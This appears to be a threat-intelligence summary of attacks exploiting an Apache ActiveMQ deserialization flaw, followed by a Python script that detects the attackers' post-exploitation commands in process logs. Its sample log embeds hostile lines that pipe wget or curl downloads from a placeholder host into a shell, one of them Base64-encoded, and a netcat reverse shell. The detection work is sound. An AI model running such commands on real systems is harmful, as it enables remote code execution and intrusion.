High
Attackers have been exploiting a remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ to deploy a range of malicious payloads, including the Mirai botnet, HelloKitty ransomware, SparkRAT and XMRig. The vulnerability affects both Apache ActiveMQ Artemis and Classic and allows unauthorized code execution because of insecure deserialization in the OpenWire protocol. Observed post-exploitation tactics include using curl and wget to download payloads, Base64 encoding to obfuscate commands, 'nohup' to keep processes from being terminated, and netcat to open reverse shells for interacting with the compromised host.

The Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Cybereason and shared publicly at https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
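The post-exploitation tactics listed above (curl/wget downloads piped to a shell, Base64-obfuscated commands, nohup-detached processes, netcat reverse shells) can be turned into simple process-creation detections. The following is an added example, not Trellix or Cybereason detection content: the regexes, the `classify`/`scan` helpers and the sample log records are all constructed for illustration, and the decoder also inspects what a `echo ... | base64 -d` blob decodes to so a hidden download is still tagged.

```python
import base64
import re

# Heuristic rules for the tactics described in the summary. These patterns
# are assumptions of this example, not vendor signatures.
RULES = {
    "download_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
    "base64_decoded_command": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "nohup_detached": re.compile(r"\bnohup\b"),
    "netcat_reverse_shell": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+\S*sh\b"),
}
# Captures the Base64 blob in an "echo <blob> | base64 -d" construct.
B64_ECHO = re.compile(r"""echo\s+['"]?([A-Za-z0-9+/=]{8,})['"]?\s*\|\s*base64\s+(-d|--decode)""")


def classify(cmdline, depth=0):
    """Return the set of rule names that match a command line. If the line
    decodes a Base64 blob, the decoded text is classified as well (bounded
    recursion, since the blob may itself contain another echo|base64)."""
    tags = {name for name, rx in RULES.items() if rx.search(cmdline)}
    m = B64_ECHO.search(cmdline)
    if m and depth < 3:
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not valid Base64
            inner = ""
        tags |= classify(inner, depth + 1)
    return tags


def scan(lines):
    """Scan records of the form 'timestamp host cmdline' and return
    (host, cmdline, sorted_tags) for every record hitting at least one rule."""
    hits = []
    for line in lines:
        _ts, host, cmdline = line.split(" ", 2)
        tags = classify(cmdline)
        if tags:
            hits.append((host, cmdline, sorted(tags)))
    return hits


# Constructed sample records (not real telemetry): 203.0.113.0/24 is a
# documentation address range and the file names are placeholders.
ENCODED = base64.b64encode(b"curl -s http://203.0.113.10/PLACEHOLDER.sh | sh").decode()
SAMPLE_LOG = [
    "2023-11-02T10:00:01Z mq01 java -jar /opt/activemq/bin/activemq.jar",
    '2023-11-02T10:00:02Z mq01 sh -c "wget -q -O /tmp/x http://203.0.113.10/PLACEHOLDER | sh"',
    '2023-11-02T10:00:03Z mq01 bash -c "echo ' + ENCODED + ' | base64 -d | bash"',
    "2023-11-02T10:00:04Z mq01 nohup /tmp/PLACEHOLDER_miner",
    "2023-11-02T10:00:05Z mq01 nc -e /bin/sh 203.0.113.10 4444",
    "2023-11-02T10:05:00Z web02 curl -s https://updates.example.invalid/status",  # benign
]

if __name__ == "__main__":
    for host, cmd, tags in scan(SAMPLE_LOG):
        print(host, tags, cmd, sep="  ")
```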
Detection rate is the number of artifact detections reported by McAfee global sensors for this threat over 4 days.